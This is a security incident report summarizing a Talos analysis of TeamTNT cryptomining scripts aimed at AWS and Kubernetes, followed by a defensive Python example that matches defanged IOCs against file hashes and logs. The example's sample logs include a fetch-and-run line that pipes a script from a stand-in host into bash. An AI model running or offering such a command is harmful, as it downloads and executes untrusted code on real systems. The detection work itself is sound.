TeamTNT Threat Group targeting AWS and Cloud Services
Incident Report for Ascend Security Events
Resolved

Source: Cisco Talos

Cisco Talos has published a blog analyzing modified versions of malicious shell scripts used by the cybercrime group TeamTNT. The malware author modified these scripts after becoming aware that security researchers had published the previous version. The scripts are primarily designed to target Amazon Web Services (AWS) but could also run on on-premises, container, or other forms of Linux instances.

Several of the TeamTNT payloads analyzed focus on cryptocurrency mining, persistence and lateral movement using techniques such as discovering and deploying onto all Kubernetes pods in a local network. There is also a script with login credentials for the primary distribution server, and another with an API key that might provide remote access to a tmate shared terminal session. Some of the TeamTNT scripts even contain defense evasion functions focused on disabling Alibaba cloud security tools. The focus on compromising modern cloud environments sets TeamTNT apart from many of the other cybercriminals encountered in the wild.

These cryptocurrency mining malware payloads use the processing power of compromised devices to generate currency for the threat actors. This can degrade the performance and shorten the lifespan of devices infected with the malware.

Indicators of Compromise:

As a result, Ascend Technologies has pushed detection for the known IOCs across our EDR, SIEM, and anti-malware platforms. These IOCs include IP addresses and hash values, which give us the ability to detect and alert on them. As is the case with most malware, end users are targeted, which makes maintaining a robust security posture highly important, including end-user training to develop safe and secure internet browsing habits.
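One way to turn an advisory's defanged IOC list (SHA-256 hashes, `x.x.x[.]x` IPs, `domain[.]tld` hosts) into a file-hash check and a log scan, as an added example that is not Talos's or Ascend's code. All indicator values, the sample script, and the log lines below are constructed for illustration, not the real TeamTNT indicators.

```python
"""Match defanged IOCs against file hashes and log lines (constructed sample data)."""
import hashlib
import re

# Constructed sample IOC list in the advisory's defanged style (NOT real indicators).
IOC_LINES = """
• 203.0.113[.]10
• 198.51.100[.]7
• example-c2[.]invalid
""".strip().splitlines()

# Constructed sample "payload"; its SHA-256 stands in for a published file hash.
SAMPLE_SCRIPT = b"#!/bin/bash\necho constructed sample payload\n"
SAMPLE_HASH = hashlib.sha256(SAMPLE_SCRIPT).hexdigest()

def refang(indicator: str) -> str:
    """Strip a bullet and undo '[.]' / 'hxxp' defanging so the value can be matched."""
    s = indicator.strip().lstrip("•-* ").strip()
    return s.replace("[.]", ".").replace("(.)", ".").replace("hxxp", "http").lower()

def parse_iocs(lines, extra_hashes=()):
    """Sort indicators into SHA-256 hashes, IPv4 addresses and domains."""
    iocs = {"sha256": set(extra_hashes), "ip": set(), "domain": set()}
    for raw in lines:
        value = refang(raw)
        if not value:
            continue
        if re.fullmatch(r"[0-9a-f]{64}", value):
            iocs["sha256"].add(value)
        elif re.fullmatch(r"(?:\d{1,3}\.){3}\d{1,3}", value):
            iocs["ip"].add(value)
        else:
            iocs["domain"].add(value)
    return iocs

def file_hash_matches(content: bytes, iocs) -> bool:
    """True if the SHA-256 of the given file content is a listed hash."""
    return hashlib.sha256(content).hexdigest() in iocs["sha256"]

def scan_logs(log_lines, iocs):
    """Return (line_no, indicator) for each log line mentioning a listed IP or domain."""
    network = sorted(iocs["ip"] | iocs["domain"])
    if not network:
        return []
    pattern = re.compile(r"\b(" + "|".join(re.escape(v) for v in network) + r")\b")
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = pattern.search(line.lower())
        if m:
            hits.append((n, m.group(1)))
    return hits

# Constructed sample log lines (not real telemetry).
SAMPLE_LOGS = [
    "2022-05-04T12:50:01Z curl -s http://203.0.113.10/setup.sh | bash",
    "2022-05-04T12:50:05Z dns query example-c2.invalid from 10.0.0.5",
    "2022-05-04T12:50:09Z sshd accepted key for ubuntu from 10.0.0.6",
]
```

Hash matching only catches byte-identical samples, which is why the advisory notes the author re-released modified scripts; the IP and domain matches survive such edits as long as the infrastructure is unchanged.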

Author: Evan Obal

Source: https://blog.talosintelligence.com/2022/04/teamtnt-targeting-aws-alibaba.html
Posted May 04, 2022 - 12:50 CDT